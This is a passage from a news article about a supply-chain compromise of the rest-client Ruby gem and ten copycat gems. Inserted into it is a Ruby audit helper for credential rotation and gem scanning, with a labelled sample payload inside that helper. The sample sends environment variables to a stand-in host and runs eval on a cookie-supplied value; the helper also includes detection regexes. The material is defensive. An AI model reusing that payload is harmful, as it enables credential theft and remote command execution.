The malicious code was discovered yesterday inside four versions of rest-client, an extremely popular Ruby library.
Dutch Ruby developer Jan Dintel said that the malicious code found in rest-client would collect and send the URL and environment variables of a compromised system to a remote server in Ukraine.
"Depending on your setup this can include credentials of services that you use, for example database, payment service provider," Dintel said.
The code also contained a backdoor: an attacker could send a cookie to a compromised project and use it to execute commands of their choosing. A subsequent investigation by the RubyGems staff found that this mechanism was being abused to insert cryptocurrency-mining code.
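As an added illustration (this is not the article's content, nor code from rest-client or the other gems it mentions), the following Ruby helper turns the two points above into checks a team could run: which environment variables an ENV-harvesting payload would have captured and therefore need rotating, and a heuristic scan for gem source that combines ENV access with a network send, or that evaluates remotely fetched or cookie-supplied input. The credential name patterns, the indicator regexes, the two sample sources and the sample environment are constructed assumptions for illustration, not a signature derived from the real malicious versions.

```ruby
# Added audit helper (constructed for this article; not code from rest-client
# or from the malicious gems). Two checks for the compromise described above:
#   1. credential_env_keys: which environment variables look like credentials,
#      i.e. what an ENV-exfiltrating payload would have captured and what an
#      affected team should rotate;
#   2. scan_gem_source / scan_installed_gems: flag Ruby source that combines
#      reading ENV with a network send, evaluates remotely fetched input, or
#      evaluates something taken from a cookie.
# The name patterns, indicator regexes and sample sources are illustrative
# assumptions, not a signature for the real malicious versions.

CREDENTIAL_PATTERNS = [
  /(^|_)(KEY|SECRET|TOKEN|PASSWORD|PASSWD|CREDENTIALS?)(_|$)/i,
  /^(DATABASE|REDIS|MONGODB|AMQP)_URL$/i,
].freeze

# Names of env vars that look like they hold secrets, sorted.
def credential_env_keys(env = ENV.to_h)
  env.keys.select { |k| CREDENTIAL_PATTERNS.any? { |re| k.match?(re) } }.sort
end

# Heuristic indicators over gem source text (label => regex).
INDICATORS = {
  # bulk access to the process environment
  reads_env:      /\bENV\.(to_h|to_hash|to_a|each|map|select|keys|inspect)\b/,
  # anything that can push data off the host
  network_send:   /\bNet::HTTP\b|\bTCPSocket\b|\bURI\.open\b|open-uri/,
  # eval of a value that comes straight from a fetch or a decode
  remote_eval:    /\b(eval|instance_eval|class_eval)\s*\(?\s*(Net::HTTP|URI\b|open\b|Base64)/,
  # a cookie value reaching eval within a short distance (may span lines)
  cookie_trigger: /cookie[\s\S]{0,200}?\beval\b/i,
}.freeze

# Labels of the indicators present in +text+, in INDICATORS order.
def scan_gem_source(text)
  INDICATORS.select { |_label, re| text.match?(re) }.keys
end

# True when the indicators combine the way the article describes the payload:
# env harvesting plus a network send, or any remote- or cookie-driven eval.
def suspicious?(text)
  hits = scan_gem_source(text)
  (hits.include?(:reads_env) && hits.include?(:network_send)) ||
    hits.include?(:remote_eval) || hits.include?(:cookie_trigger)
end

# Paths of .rb files under the installed gem directories that look suspicious.
def scan_installed_gems(gem_paths = Gem.path)
  gem_paths.flat_map { |root| Dir.glob(File.join(root, "gems", "*", "**", "*.rb")) }
           .select { |path| suspicious?(File.binread(path)) rescue false }
end

# Constructed sample modelled on the behaviour the article describes
# (never executed here; it is only scanned as text).
SAMPLE_MALICIOUS = <<~'RUBY'
  require "net/http"
  require "json"
  require "base64"
  def self.report(url)
    body = { url: url, env: ENV.to_h }.to_json
    Net::HTTP.post(URI("http://collector.invalid/"), body)
  end
  def self.call(env)
    payload = env["HTTP_COOKIE"].to_s[/backdoor=([^;]+)/, 1]
    eval(Base64.decode64(payload)) if payload
  end
RUBY

# Constructed benign sample: talks to the network but never touches ENV or eval.
SAMPLE_BENIGN = <<~'RUBY'
  require "net/http"
  module TinyClient
    def self.get(url)
      Net::HTTP.get(URI(url))
    end
  end
RUBY

# Constructed environment of the kind a Rails deployment might carry.
SAMPLE_ENV = {
  "PATH" => "/usr/bin", "HOME" => "/home/app", "RAILS_ENV" => "production",
  "DATABASE_URL" => "postgres://app:hunter2@db/app",
  "STRIPE_SECRET_KEY" => "sk_live_example",
  "AWS_SECRET_ACCESS_KEY" => "example",
  "SECRET_KEY_BASE" => "deadbeef",
  "LANG" => "C.UTF-8",
}.freeze

if __FILE__ == $PROGRAM_NAME
  puts "credential-looking env vars: #{credential_env_keys(SAMPLE_ENV).join(', ')}"
  puts "malicious sample: #{scan_gem_source(SAMPLE_MALICIOUS).inspect} suspicious=#{suspicious?(SAMPLE_MALICIOUS)}"
  puts "benign sample:    #{scan_gem_source(SAMPLE_BENIGN).inspect} suspicious=#{suspicious?(SAMPLE_BENIGN)}"
end
```

Run it as a script to see the sample results, or call scan_installed_gems on an affected machine; treat hits as a starting point for manual review, since the patterns will miss an obfuscated payload and will flag some legitimate HTTP clients that also read ENV.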
RubyGems staff also uncovered similar code in 10 other projects. All of these libraries, except rest-client, had been created by taking another fully functional library, adding the malicious code, and re-uploading it to RubyGems under a new name. In total, the 18 malicious library versions amassed only 3,584 downloads before being removed from RubyGems.